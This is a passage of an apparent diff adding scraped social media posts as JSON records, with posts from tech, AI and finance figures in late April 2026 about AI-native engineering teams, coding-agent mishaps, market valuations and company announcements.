"@AndrewYNg", + "name": "Andrew Ng", + "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play broader roles than just writing code. They are partly product managers, designers, sometimes marketers. Further, small teams who work in the same office, where they can communicate face-to-face, can move incredibly quickly.\n\nBecause we can now build fast, a greater fraction of time must be spent deciding what to build. To deal with this project-management bottleneck, some teams are pushing engineer:product manager (PM) some teams are pushing engineer:product manager (PM) ratios downward from, say, 8:1 to as low as 1:1. But we can do even better: If we have one PM who decides what to build and one engineer who builds it, the communication between them becomes a bottleneck. This is why the fastest-moving teams I see tend to have engineers who know how to do some product work (and, optionally, some PMs who know how to do some engineering work). When an engineer understands users and can make decisions on what to build and build it directly, they can execute incredibly quickly.\n\nI’ve seen engineers successfully expand their roles to including making product decisions, and PMs expand their roles to building software. The tech industry has more engineers than PMs, but both are promising paths. If you are an engineer, you’ll find it useful to learn some product management skills, and if you’re a PM, please learn to build!\n\nLooking beyond the product-management bottleneck, I also see bottlenecks in design, marketing, legal compliance, and much more. When we speed up coding 10x or 100x, everything else becomes slow in comparison. For example, some of my teams have built great features so quickly that the marketing organization was left scrambling to figure out how to communicate them to users — a marketing bottleneck. Or when a team can build software in a day that the legal department needs a week to review, that’s a legal compliance bottleneck. In this way, agentic coding isn’t just changing the workflow of software engineering, it’s also changing all the teams around it.\n\nWhen smaller, AI-enabled teams can get more done, generalists excel. Traditional companies need to pull together people from many specialties — engineering, product management, design, marketing, legal, etc. — to execute projects and create value. This has resulted in large teams of specialists who work together. But if a team of 2 persons is to get work done that require 5 different specialities, then some of those individuals must play roles outside a single speciality. In some small teams, individuals do have deep specializations. For example, one might be a great engineer and another a great PM. But they also understand the other key functions needed to move a project forward, and can jump into thinking through other kinds of problems as needed. Of course, proficiency with AI tools is a big help, since it helps us to think through problems that involve different roles.\n\nEven in a two-person team, to move fast, communication bottlenecks also must be minimized. This is why I value teams that work in the same location. Remote teams can perform well too, but the highest speed is achieved by having everyone in the room, able to communicate instantaneously to solve problems.\n\nThis post focuses on AI-native teams with around 2-10 persons, but not everything can be done by a small team. I'll address the coordination of larger teams in the future.\n\nI realize these shifts to job roles are tough to navigate for many people. At the same time, I am encouraged that individuals and small teams who are willing to learn the relevant skills are now able to get far more done than was possible before. This is the golden age of learning and building!\n\n[Original text: https://www.deeplearning.ai/the-batch/issue-349/ ]", + "url": "https://nitter.net/AndrewYNg/status/2048793852702757151#m", + "published_at": "2026-04-27T15:58:13+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: update! the @twistartups AI sidebar is going well\n\nThe goal: a live AI sidebar with 4 personas watching the pod in real time\n\nProgress update: \n✅ Side bar (Chrome extension works with any website)\n✅ Two characters: comedian fox + troll alien\n✅ Ability to adjust frequency / skip commentary\n\nit's honestly starting to feel pretty good\n\n\"they want to integrate a fact checker, which is just a polite way of saying their show needs a fact checker\"\n-fox 😂\n\n@Jason check it out 👇", + "url": "https://nitter.net/lina_colucci/status/2048793378511536538#m", + "published_at": "2026-04-27T15:56:20+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, those fan boys would say “y’all shoulda known”.", + "url": "https://nitter.net/GaryMarcus/status/2048791912149295182#m", + "published_at": "2026-04-27T15:50:31+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.", + "url": "https://nitter.net/GaryMarcus/status/2048787646206677207#m", + "published_at": "2026-04-27T15:33:34+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "This is totally wrong.\n\nBlaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and other guardrails.", + "url": "https://nitter.net/GaryMarcus/status/2048787157536653627#m", + "published_at": "2026-04-27T15:31:37+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "If extremely violent criminals are not imprisoned, eventually they will murder innocent people", + "url": "https://nitter.net/elonmusk/status/2048783014075777369#m", + "published_at": "2026-04-27T15:15:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Best accounts for following Austin air quality? @grok", + "url": "https://nitter.net/Jason/status/2048780089295302690#m", + "published_at": "2026-04-27T15:03:32+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Excellent point", + "url": "https://nitter.net/elonmusk/status/2048777628019032335#m", + "published_at": "2026-04-27T14:53:45+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "yep, that’s what I do. \n\nI am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me.\n\ni don’t think that is going to end well.", + "url": "https://nitter.net/GaryMarcus/status/2048771044987777428#m", + "published_at": "2026-04-27T14:27:36+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw", + "url": "https://nitter.net/HarryStebbings/status/2048764743205134644#m", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is zero fluff, like none. He says what he means and means what he says.\n\nApplovin does $10M EBITDA per head.\n\nThey have 80%+ margins.\n\nThey do $5.48BN in revenue.\n\nNo business on the planet has numbers like Applovin.\n\nFollowing the discussion, I wrote up my biggest lessons from sitting down with him and summarised them below:\n\n1. Are People Ready for the AI Future That Is Within Every Company?\n\nTrue AI integration requires a massive \"leveling up\" of talent. Companies must be honest about the path forward: keeping employees who fail to adopt AI creates a \"blockade\" to reaching a truly AI-native state. Consequently, we should expect continued tech layoffs as organizations prioritize efficiency over legacy headcount.\n\n2. Biggest Advice on Token Budgeting and Token Maxing?\n\nTreating tokens as a simple budget or leaderboard is \"flawed logic\". If you incentivize raw usage, teams will simply create high-volume \"crap\" that burns capital without driving revenue. Instead, optimize for specific KPIs where token consumption aligns directly with business growth; when revenue is on the other side, the \"budget\" mindset disappears.\n\n3. Can You Have a Team Full of Only A Players?\n\nAn organization cannot thrive if A players are surrounded by B, C, or D players. AppLovin slimmed its HR department from 80 people to 15 by retaining only \"doers\" who don't get bogged down in the process. The goal is a lean culture of individual contributors who want to make a difference without needing heavy management layers.\n\n4. Do the Majority of Company Teams Need to Be Rebuilt for the Technology We Have Today?\n\nIf a role is likely to be automated, or if a department is too slow to adopt AI, it is time to rebuild that organization from the ground up. Foroughi cut staff by 40-50% in most departments during a year of triple-digit growth to force the organization into an automated, efficient state.\n\n5. Why Investors Need to Give Ceos Better Comp Packages\n\nFounders take massive risks to build something out of nothing, and they need continued upside to stay mentally motivated. If a CEO is expected to work without performance-based incentives, they may drift toward new ventures rather than staying committed to the \"lonely, stressful\" task of scaling a public company.\n\n6. Why This $160 Billion Company Does Not Have Any Learning and Development\n\nStructured L&D is often disconnected from the reality of high-performance work. The best employees are curious enough to figure things out on their own. By documenting all communication in transcripts and chats, new hires can use AI models to summarize tribal knowledge and develop themselves more effectively than any formal training program.\n\n(links below)", + "url": "https://nitter.net/HarryStebbings/status/2048764741435179442#m", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quickly back to new all-time highs. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://nitter.net/charliebilello/status/2048761760971096534#m", + "published_at": "2026-04-27T13:50:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://nitter.net/JeffDean/status/2048759102390899142#m", + "published_at": "2026-04-27T13:40:08+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system prompts and guardrails would save him. They didn’t. \n\nIn this case he lost data. Eventually people will lose lives.", + "url": "https://nitter.net/GaryMarcus/status/2048757233174122827#m", + "published_at": "2026-04-27T13:32:43+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go to Canary Wharf, set up AI training centre. Partner with Goldman, JP Morgan etc etc. Sign enterprise agreement with them to train all new employees. \n\nBoth absolute goldmines!", + "url": "https://nitter.net/HarryStebbings/status/2048756619622707452#m", + "published_at": "2026-04-27T13:30:16+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://nitter.net/soumithchintala/status/2048756358820827564#m", + "published_at": "2026-04-27T13:29:14+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030.", + "url": "https://nitter.net/sama/status/2048755148361707946#m", + "published_at": "2026-04-27T13:24:26+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s", + "url": "https://nitter.net/charliebilello/status/2048753179471323584#m", + "published_at": "2026-04-27T13:16:36+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", + "url": "https://nitter.net/sama/status/2048751392031203544#m", + "published_at": "2026-04-27T13:09:30+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://nitter.net/charliebilello/status/2048751094671585397#m", + "published_at": "2026-04-27T13:08:19+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Wondering which month is the best time to start investing?\nThe right answer is any month. Just start!", + "url": "https://nitter.net/PeterMallouk/status/2048747238986305979#m", + "published_at": "2026-04-27T12:53:00+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", + "url": "https://nitter.net/GaryMarcus/status/2048746152749846549#m", + "published_at": "2026-04-27T12:48:41+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet.\n\n• Up to 3 Starlink antennas on each A380 for massive speed boost\n\n• Internet performance improved up to 1000x vs older systems\n\n• Enables streaming, gaming, video calls & real-time work onboard\n\n• Rollout begins in 2026 as part of fleet-wide upgrade\n\nA major leap in aviation connectivity 🚀", + "url": "https://nitter.net/cb_doge/status/2048744214230712500#m", + "published_at": "2026-04-27T12:40:59+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactly why* we still need software engineers — and why what Dario recently said about software engineers disappearing is so absurd.\n\nSkilled coders can use vibe-coded tools, with careful oversight.\n\nBut amateurs using vibe-coding tools are asking for trouble. \n\nUsing them without a strong prior working knowledge in coding and sysadmin *is* the mistake.", + "url": "https://nitter.net/GaryMarcus/status/2048742983684784239#m", + "published_at": "2026-04-27T12:36:05+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Vibe coded disasters piling up on Reddit”", + "url": "https://nitter.net/GaryMarcus/status/2048739005525877072#m", + "published_at": "2026-04-27T12:20:17+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. \n\nOpenAI doesn’t “benefit all of humanity.”", + "url": "https://nitter.net/KatieMiller/status/2048727747954868342#m", + "published_at": "2026-04-27T11:35:33+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his private residence, censored him, gagged him, tried to bankrupt him, and attempted to remove him from state ballots. \n\nWhen all of that failed they tried to assassinate him not once but four times. \n\nAnd they go on national television to talk about how we need to vote for them to save democracy.", + "url": "https://nitter.net/jason_meister/status/2048720909809156378#m", + "published_at": "2026-04-27T11:08:22+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", + "url": "https://nitter.net/paulg/status/2048704073356935676#m", + "published_at": "2026-04-27T10:01:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", + "url": "https://nitter.net/paulg/status/2048701354672050286#m", + "published_at": "2026-04-27T09:50:40+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "url": "https://nitter.net/paulg/status/2048677984106664227#m", + "published_at": "2026-04-27T08:17:48+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "😳", + "url": "https://nitter.net/pmarca/status/2048677114480873657#m", + "published_at": "2026-04-27T08:14:21+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "cc @BrendanEich", + "url": "https://nitter.net/pmarca/status/2048675385119019444#m", + "published_at": "2026-04-27T08:07:29+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://nitter.net/pmarca/status/2048674564314685477#m", + "published_at": "2026-04-27T08:04:13+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "But \"A Disservice To Those Who Are Watching\" is the name of this show!", + "url": "https://nitter.net/pmarca/status/2048673940072251670#m", + "published_at": "2026-04-27T08:01:44+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "cc @elonmusk", + "url": "https://nitter.net/pmarca/status/2048673488383447437#m", + "published_at": "2026-04-27T07:59:56+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "When one thing becomes abundant and cheap, another thing becomes scarce and valuable.", + "url": "https://nitter.net/pmarca/status/2048624098398650608#m", + "published_at": "2026-04-27T04:43:41+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: \"Imagine if he heard how the world really worked. Wonder what manifesto would say then.\"", + "url": "https://nitter.net/pmarca/status/2048621340408844368#m", + "published_at": "2026-04-27T04:32:43+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Image", + "url": "https://nitter.net/pmarca/status/2048620511912194339#m", + "published_at": "2026-04-27T04:29:26+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "The apps can rewrite the files. 👀", + "url": "https://nitter.net/pmarca/status/2048615807190769738#m", + "published_at": "2026-04-27T04:10:44+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. This is the result: a 90 minute insiders documentary. \n\nI don't work for Y Combinator itself, but I'll give you the experience I've had as a founder, alumni, investor etc. He showed up in March with cameras, videographers, newscasters, youtubers. He brought half the French tech press. \n\nWe spent 4 full days visiting YC founder offices and hacker houses. Going to pre-demo day practice sessions. Late night bar hopping with YC founders. Interviews with YC partners. \n\nIt was real. It was unfiltered. And it was inspiring.\n\nI went to Paris last week with my daughter Callie to watch it in a packed movie theater. This crowd of 500+ French investors got inspired about investing into YC startups. After watching this movie, they understand what I wish everyone understood: YC founders are incredibly capable and resilient builders that want to solve problems and YC helps them become formidable founders. It's impossible to not be inspired by them.\n\nAlan and Bradley Lafond just released the movie on Youtube (link below). Enjoy it! J'espère que vous l'apprécierez!\n\nA big thank you to @dessaigne, @garrytan, Victoria Holst and everyone at YC for helping us. This wasn't an official YC event (our fund and Fundora are not a part of YC to be clear). But they were so welcoming and generous!\n\nIt's an honor to share with France (and now with y'all) the experience I've gotten from YC. Our fund Orange Collective exists to help spread the YC love. If you were thinking of joining us as an investor for Fund I, contact me now before the final close on June 1st. If you're in France, contact Fundora. \n\nAnd big thank you to @nico_laqua, @qhoang09, @gregpr07, @mamagnus00, @smthomas3, @abhiaiyer, @marieschneegans, Veiga Management, Fundora and all the YC founders that hosted us!", + "url": "https://nitter.net/jasonfreedman/status/2048615296613937201#m", + "published_at": "2026-04-27T04:08:42+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases.", + "url": "https://nitter.net/pmarca/status/2048614869352714619#m", + "published_at": "2026-04-27T04:07:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "🇺🇸", + "url": "https://nitter.net/pmarca/status/2048614659595583651#m", + "published_at": "2026-04-27T04:06:10+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases (in the universe).", + "url": "https://nitter.net/pmarca/status/2048614305705386433#m", + "published_at": "2026-04-27T04:04:46+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Concerning.", + "url": "https://nitter.net/pmarca/status/2048612144871264609#m", + "published_at": "2026-04-27T03:56:11+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Self recommending!", + "url": "https://nitter.net/pmarca/status/2048610397243265189#m", + "published_at": "2026-04-27T03:49:14+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", + "url": "https://nitter.net/atmoio/status/2048608025464705084#m", + "published_at": "2026-04-27T03:39:49+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grok Imagine", + "url": "https://nitter.net/elonmusk/status/2048600964102246438#m", + "published_at": "2026-04-27T03:11:45+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Self recommending recommending.", + "url": "https://nitter.net/pmarca/status/2048598334492033455#m", + "published_at": "2026-04-27T03:01:18+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://nitter.net/pmarca/status/2048597298150875169#m", + "published_at": "2026-04-27T02:57:11+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic principle, either.\n\n𝗪𝗵𝗶𝗰𝗵 𝗶𝘀 *𝗲𝘅𝗮𝗰𝘁𝗹𝘆* 𝘄𝗵𝘆 𝘄𝗲 𝘀𝗵𝗼𝘂𝗹𝗱 𝗻𝗼𝘁 𝘁𝗿𝘂𝘀𝘁 𝗰𝗼𝗱𝗶𝗻𝗴 𝗮𝗴𝗲𝗻𝘁𝘀.", + "url": "https://nitter.net/GaryMarcus/status/2048593283639894520#m", + "published_at": "2026-04-27T02:41:14+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://nitter.net/pmarca/status/2048591674688037210#m", + "published_at": "2026-04-27T02:34:50+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a", + "url": "https://nitter.net/elonmusk/status/2048589691054694406#m", + "published_at": "2026-04-27T02:26:57+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can’t get even close.", + "url": "https://nitter.net/SteveStricklan6/status/2048589239915577837#m", + "published_at": "2026-04-27T02:25:10+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: \"Did a Claw post this?\"", + "url": "https://nitter.net/pmarca/status/2048589233095643240#m", + "published_at": "2026-04-27T02:25:08+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", + "url": "https://nitter.net/suchenzang/status/2048582672163995766#m", + "published_at": "2026-04-27T01:59:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Incredible writing from @euphoriaHBO", + "url": "https://nitter.net/Jason/status/2048580651985604783#m", + "published_at": "2026-04-27T01:51:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", + "url": "https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m", + "published_at": "2026-04-27T01:48:56+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.", + "url": "https://nitter.net/FrankRundatz/status/2048579079121555764#m", + "published_at": "2026-04-27T01:44:47+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "the difference is that we don’t *hype* giving 12 year-olds bulldozers.\n\n*of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point.\n\nvibe coding without considerable experience is like driving without a license.", + "url": "https://nitter.net/GaryMarcus/status/2048578055283880296#m", + "published_at": "2026-04-27T01:40:43+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: \"Now, software is just the prompt for the next version of the software.\"", + "url": "https://nitter.net/pmarca/status/2048573035616375134#m", + "published_at": "2026-04-27T01:20:46+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: Never ever use generative AI for anything critical. \n\nThe technology is probablistic all the way down and therefore inherently unreliable. \n\nWhy is this so hard to understand? \n\nIt’s wild how many seemingly smart people have drunk the cool aid on this.", + "url": "https://nitter.net/SteveStricklan6/status/2048570082843082905#m", + "published_at": "2026-04-27T01:09:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Generative AI as the Hindenberg", + "url": "https://nitter.net/GaryMarcus/status/2048567837221089669#m", + "published_at": "2026-04-27T01:00:07+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Is it me or X starting to look like a vibe coded mess?\n\nPolls are broken.\n\nAccounts are getting hacked.\n\nMy DMs are full of phishing scams.\n\nBasics that used to work no longer work.", + "url": "https://nitter.net/GaryMarcus/status/2048558998325166498#m", + "published_at": "2026-04-27T00:25:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", + "url": "https://nitter.net/sama/status/2048554097985593849#m", + "published_at": "2026-04-27T00:05:31+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:", + "url": "https://nitter.net/GaryMarcus/status/2048553390540734479#m", + "published_at": "2026-04-27T00:02:43+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Total AI disaster, totally predictable", + "url": "https://nitter.net/GaryMarcus/status/2048552931923013916#m", + "published_at": "2026-04-27T00:00:53+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", + "url": "https://nitter.net/sama/status/2048552677433643427#m", + "published_at": "2026-04-26T23:59:53+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Remember this", + "url": "https://nitter.net/elonmusk/status/2048543344746250466#m", + "published_at": "2026-04-26T23:22:48+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grad school indoctrination camps", + "url": "https://nitter.net/elonmusk/status/2048535299102265720#m", + "published_at": 